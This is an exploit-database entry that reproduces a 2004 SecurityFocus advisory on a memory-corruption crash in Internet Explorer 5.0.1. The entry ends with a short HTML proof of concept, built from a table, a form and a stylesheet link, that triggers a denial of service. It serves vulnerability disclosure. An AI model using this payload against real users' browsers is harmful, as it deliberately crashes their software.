Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption



EKU-ID: 29552 CVE: OSVDB-ID:
Author: henkie_is_leet Published: 2004-05-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/10382/info

A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file.

This issue could be exploited by a remote attacker to cause a denial of service condition in the browser.

<table>
<td>
<form class="quick">
<td>
</form>
</table>
<link rel="stylesheet" href="link.css">